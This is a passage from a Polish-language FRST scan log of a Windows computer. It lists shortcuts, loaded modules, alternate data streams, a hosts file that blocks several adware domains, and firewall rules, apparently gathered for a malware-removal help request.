o..lnk -> hxxp://akmf.pl Shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ministerstwo Finansów\Jednolity Plik Kontrolny.lnk -> hxxp://jpk.mf.gov.pl Shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ministerstwo Finansów\Ministerstwo Finansów.lnk -> hxxp://www.mf.gov.pl ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP% ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF% ==================== Załadowane moduły (filtrowane) ============== 2014-03-06 18:15 - 2013-12-03 11:05 - 000208896 _____ (Alexander Roshal) [Brak podpisu cyfrowego] C:\Program Files\WinRAR\rarext.dll 2010-11-18 21:08 - 2010-11-18 21:08 - 000086016 _____ (Igor Pavlov) [Brak podpisu cyfrowego] C:\Program Files\7-Zip\7-zip.dll 2012-03-28 18:16 - 2012-03-28 18:16 - 000503744 _____ (Adobe Systems Incorporated -> Adobe Systems Incorporated) [Brak podpisu cyfrowego] C:\Adobe Web Premium\Adobe InDesign CS6\Plug-ins\INTERACTIVE\BUTTONUI.APLN 2012-07-16 18:50 - 2012-07-16 18:50 - 000027136 _____ (Adobe Systems Incorporated) [Brak podpisu cyfrowego] C:\Adobe Web Premium\Adobe InDesign CS6\Plug-ins\EXPORT FOR KINDLE\KINDLEEXPORT.PLN 2012-03-28 11:18 - 2012-03-28 11:18 - 000034816 _____ (Adobe Systems, Incorporated) [Brak podpisu cyfrowego] C:\Adobe Web Premium\Adobe InDesign CS6\Required\photoshop libraries\FastCore.8BX 2012-03-28 11:18 - 2012-03-28 11:18 - 000245248 _____ (Adobe Systems, Incorporated) [Brak podpisu cyfrowego] C:\Adobe Web Premium\Adobe InDesign CS6\Required\photoshop libraries\MMXCore.8BX 2012-03-28 11:18 - 2012-03-28 11:18 - 000454144 _____ (Adobe Systems, Incorporated) [Brak podpisu cyfrowego] C:\Adobe Web Premium\Adobe InDesign CS6\Required\photoshop libraries\MultiProcessor Support.8BX ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\Windows\notepad.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\aaclient.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\basesrv.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\bcryptprimitives.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\catsrvut.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\ccdcmbwux64.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\cewmdm.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\COLORCNV.DLL:$CmdTcID [130] AlternateDataStreams: C:\Windows\system32\comctl32.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\comsvcs.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\CPFilters.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\d3d10level9.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\d3d10warp.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\devenum.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\els.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\EncDec.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\fixmapi.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\FwRemoteSvr.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\gpapi.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\gpprefcl.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\gpscript.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\gpscript.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\gpsvc.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\InkEd.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\IPSECSVC.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\jnwmon.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\ksproxy.ax:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\ksuser.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\mapi32.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\mapistub.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\mcmde.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\mcupdate_GenuineIntel.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\mfds.dll:$CmdTcID [130] AlternateDataStreams: C:\Windows\system32\mfvdsp.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\MFWMAAEC.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\MP3DMOD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\MP43DECD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\MP4SDECD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\MPG4DECD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\msmpeg2adec.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\MSMPEG2ENC.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\msmpeg2vdec.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\mstscax.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\mswsock.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\msxml6.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\msxml6r.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\mtxoci.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\nmwcdcoclsx64.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\notepad.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\polstore.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\qasf.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\qedit.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\RESAMPLEDMO.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\schedsvc.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\seclogon.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\services.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\StructuredQuery.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\SysFxUI.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\sysmain.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\tsgqec.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\VIDRESZR.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\WindowsCodecs.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\winhttp.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\winipsec.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\winresume.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\WMADMOD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\WMADMOE.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\WMALFXGFXDSP.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\wmpmde.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\WMSPDMOD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\WMSPDMOE.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\WMVDECOD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\WMVENCOD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\WMVSDECD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\WMVSENCD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\WMVXENCD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\ws2_32.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\wshrm.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\aaclient.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\bcryptprimitives.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\catsrvut.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\cewmdm.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\COLORCNV.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\comctl32.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\comsvcs.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\CPFilters.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\d3d10level9.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\d3d10warp.dll:$CmdTcID [130] AlternateDataStreams: C:\Windows\SysWOW64\devenum.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\els.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\EncDec.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\fixmapi.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\FwRemoteSvr.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\gpapi.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\gpprefcl.dll:$CmdTcID [130] AlternateDataStreams: C:\Windows\SysWOW64\gpscript.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\gpscript.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\InkEd.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\javaws.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\ksproxy.ax:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\ksuser.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\mapi32.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\mapistub.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\mfds.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\mfvdsp.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\MFWMAAEC.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\MP3DMOD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\MP43DECD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\MP4SDECD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\MPG4DECD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\msmpeg2adec.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\MSMPEG2ENC.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\msmpeg2vdec.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\msorcl32.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\mstscax.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\MSVCP50.DLL:$CmdTcID [130] AlternateDataStreams: C:\Windows\SysWOW64\mswsock.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\msxml6.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\msxml6r.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\mtxoci.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\notepad.exe:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\polstore.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\qasf.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\qedit.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\RESAMPLEDMO.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\StructuredQuery.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\tsgqec.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\VIDRESZR.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\WindowsCodecs.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\winhttp.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\winipsec.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\WMADMOD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\WMADMOE.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\wmpmde.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\WMSPDMOD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\WMSPDMOE.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\WMVDECOD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\WMVENCOD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\WMVSDECD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\WMVSENCD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\WMVXENCD.DLL:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\ws2_32.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\SysWOW64\wshrm.dll:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\Drivers\drmk.sys:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\Drivers\drmkaud.sys:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\Drivers\ndis.sys:$CmdTcID [130] AlternateDataStreams: C:\Windows\system32\Drivers\nmwcdnsux64.sys:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\Drivers\portcls.sys:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\Drivers\rmcast.sys:$CmdTcID [64] AlternateDataStreams: C:\Windows\system32\Drivers\USBSTOR.SYS:$CmdTcID [130] AlternateDataStreams: C:\ProgramData\TEMP:160ADF0B [231] AlternateDataStreams: C:\ProgramData\TEMP:2CB9631F [270] AlternateDataStreams: C:\ProgramData\TEMP:66AA0486 [392] AlternateDataStreams: C:\ProgramData\TEMP:A303874F [136] AlternateDataStreams: C:\Users\karo\Desktop\FontViewer.exe:$CmdTcID [64] AlternateDataStreams: C:\Users\karo\Desktop\FontViewer.exe:$CmdZnID [26] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1" ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) HKU\S-1-5-21-2235225777-535561683-332804176-1000\Software\Classes\.exe: => <==== UWAGA ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 03:34 - 2019-03-13 02:35 - 000000464 _____ C:\Windows\system32\drivers\etc\hosts 127.0.0.1 space1.adminpressure.space 127.0.0.1 trackpressure.website 127.0.0.1 htagzdownload.pw 127.0.0.1 texttotalk.org 127.0.0.1 360devtraking.website 127.0.0.1 room1.360dev.info 127.0.0.1 djapp.info 127.0.0.1 technologievimy.com 127.0.0.1 sharefolder.online 127.0.0.1 install.portmdfmoon.com 127.0.0.1 adkqow01283.pw 127.0.0.1 telechargini.com 127.0.0.1 rothsideadome.pw 127.0.0.1 fffffk.xyz 127.0.0.1 smarttrackk.xyz 127.0.0.1 discretdan.com ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;%C_EM64T_REDIST11%bin\Intel64;C:\ProgramData\Oracle\Java\javapath;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files\Calibre2\ HKU\S-1-5-21-2235225777-535561683-332804176-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: Urządzenie nie jest podłączone do internetu. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == Załączenie wejścia w fixlist spowoduje jego usunięcie. ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [TCP Query User{5DEC3296-568D-4607-B97A-52156B29620D}C:\users\user\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\user\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [UDP Query User{BE2FDB5E-205D-48FC-B108-21A894A5FF05}C:\users\user\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\user\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [TCP Query User{E911B7AB-84F9-436A-A561-29A7BFB159B1}C:\users\user\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\user\appdata\roaming\dropbox\bin\dropbox.exe Brak pliku FirewallRules: [UDP Query User{7CB3CA27-0D15-4F05-BE3A-CCA84172B444}C:\users\user\appdata\roaming\dropbox\bin\dropbox.exe] => (Allow) C:\users\user\appdata\roaming\dropbox\bin\dropbox.exe Brak pliku FirewallRules: [{2175D150-3611-44E1-829B-A5A25E8E51CC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [{2DCE9D12-CACA-4543-8D5F-2E1C38D58B0C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [TCP Query User{CA94F369-3C29-4DC4-8BA3-532A34C04D74}C:\program files (x86)\soulseekqt\soulseekqt.exe] => (Allow) C:\program files (x86)\soulseekqt\soulseekqt.exe Brak pliku FirewallRules: [UDP Query User{3006BD86-ECA7-470A-85F7-2F99597ECAED}C:\program files (x86)\soulseekqt\soulseekqt.exe] => (Allow) C:\program files (x86)\soulseekqt\soulseekqt.exe Brak pliku FirewallRules: [TCP Query User{90FF7CB5-C8B7-4440-9906-798CB4DFE203}C:\program files\miranda im\miranda32.exe] => (Allow) C:\program files\miranda im\miranda32.exe (Miranda NG team) [Brak podpisu cyfrowego] FirewallRules: [UDP Query User{7A412A30-0CDF-4CB8-B07D-A2A562C9CA78}C:\program files\miranda im\miranda32.exe] => (Allow) C:\program files\miranda im\miranda32.exe (Miranda NG team) [Brak podpisu cyfrowego] FirewallRules: [TCP Query User{2E81DAE6-70BC-4252-8E12-DA75AB2C65AB}C:\users\karo\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\karo\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [UDP Query User{5E34ABAC-C62C-4502-A63A-4A6DB3E72409}C:\users\karo\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\karo\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [TCP Query User{A2AB20D3-214D-4290-9121-1A818F7D6363}C:\program files\totalcmd\totalcmd64.exe] => (Allow) C:\program files\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH) FirewallRules: [UDP Query User{D7EB6A11-03CA-4356-92D2-45D9CA599F73}C:\program files\totalcmd\totalcmd64.exe] => (Allow) C:\program files\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH) FirewallRules: [TCP Query User{99F3943C-AEC8-46D3-A63D-3155698F2262}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [UDP Query User{E2D557EA-24F8-4268-B3EA-CAB5B5256453}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [TCP Query User{524508D8-5F6C-4DCE-AD83-BFF2C3313299}C:\users\user\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\user\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [UDP Query User{942A2B12-7AA6-41AD-97C7-2AFDB39AC0C1}C:\users\user\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\user\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [TCP Query User{EDA1E20F-8DE6-4114-84FC-5130B314CB63}C:\program files\miranda im\miranda32.exe] => (Allow) C:\program files\miranda im\miranda32.exe (Miranda NG team) [Brak podpisu cyfrowego] FirewallRules: [UDP Query User{3CE82940-53CE-48E7-8FDF-7FD9C872E6A7}C:\program files\miranda im\miranda32.exe] => (Allow) C:\program files\miranda im\miranda32.exe (Miranda NG team) [Brak podpisu cyfrowego] FirewallRules: [TCP Query User{C3B0CD5D-5014-4D39-8EC3-1A1DE6C03217}C:\program files (x86)\soulseekqt\soulseekqt.exe] => (Allow) C:\program files (x86)\soulseekqt\soulseekqt.exe Brak pliku FirewallRules: [UDP Query User{44562EF9-A25B-4D22-9952-8B27B11BA59A}C:\program files (x86)\soulseekqt\soulseekqt.exe] => (Allow) C:\program files (x86)\soulseekqt\soulseekqt.exe Brak pliku FirewallRules: [TCP Query User{B1438257-6C51-4DDE-AB92-2DA7F6696250}C:\program files (x86)\toon boom animation\toon boom harmony 14.0 premium\win64\bin\harmonypremium.exe] => (Allow) C:\program files (x86)\toon boom animation\toon boom harmony 14.0 premium\win64\bin\harmonypremium.exe (Toon Boom Animation Inc -> Toon Boom Animation Inc.) FirewallRules: [UDP Query User{BAC58F96-5578-4524-A60E-E2C7CDE6763F}C:\program files (x86)\toon boom animation\toon boom harmony 14.0 premium\win64\bin\harmonypremium.exe] => (Allow) C:\program files (x86)\toon boom animation\toon boom harmony 14.0 premium\win64\bin\harmonypremium.exe (Toon Boom Animation Inc -> Toon Boom Animation Inc.) FirewallRules: [{4A14C4B5-E5C7-464F-9906-D302E5B55975}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{91B77E4B-97B9-493F-A19B-2D24308226BB}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{90C0FC46-34B1-49BE-9B5A-C6CEAE23AA93}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{864EE2E8-8B87-4493-B0F4-86AD3EDB837E}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{34198088-1087-4D30-BB7C-2EC5733E504E}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{4DEF2152-CD56-40F0-8E2E-63B406893732}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{B0E673AD-A5A5-4ABE-B90F-662316AE6FB5}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{D04524C9-6CC1-479A-950F-E9735B30CBB7}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{90364810-8753-4BED-A12D-1B45C727FD06}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{FDFDA379-D586-4516-99F8-7B59F8E9A483}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{DF9089C9-D4AA-4A33-A757-237E64689DC9}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{5163BCAD-DD57-4F37-9C42-082F46B72E82}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{A5276312-E7AD-4D8A-A1B8-5B06BB05E8B1}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{7D35F66E-3B72-4303-A2F2-ADEA9CC258E3}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{300C8872-3157-4B70-9F14-97A25DCA0556}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{E41461D8-9DF5-471C-B1D5-D2673D3050B7}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{0B96C2BD-4D9D-4B68-AE97-0075771A1FCC}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{FAED70E2-8D43-4F1E-959B-05DBE82DA277}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{B81E2377-0023-4320-8BD0-CD4751DE8878}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{CE1CD19A-C236-4CBA-AE95-6706F15C8E7D}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{DBAA7435-50C3-44C0-B13F-17D17B04051E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{4890B4A0-67C2-444E-9C6E-B401E49EFC79}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{93691619-3758-4A11-8D6F-649FA53B17AE}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{3BA033E9-2DE0-432B-BA44-D8DA302F5327}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{9A4032CC-7849-461A-8D44-E2F94C9D4E50}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{DAF52FDF-F031-4140-A407-1F55715502BA}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{248E85E9-85B5-4A84-A523-8FB25E906050}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{ADDB3B1D-D6ED-443E-81AB-B8CE408497CA}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{F5DDF0D2-6927-40EC-B812-89810F2190CB}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{281C973F-935D-4377-8814-7B68FE7D668E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation) FirewallRules: [{7836DB9E-8D85-431F-9DF5-3F29D9AB01C5}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{8BDD7F73-2582-41B9-B514-C820DF5FF2AB}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{82A64EA0-EFD2-4F0A-9113-D695184CCD4F}] => (Allow) 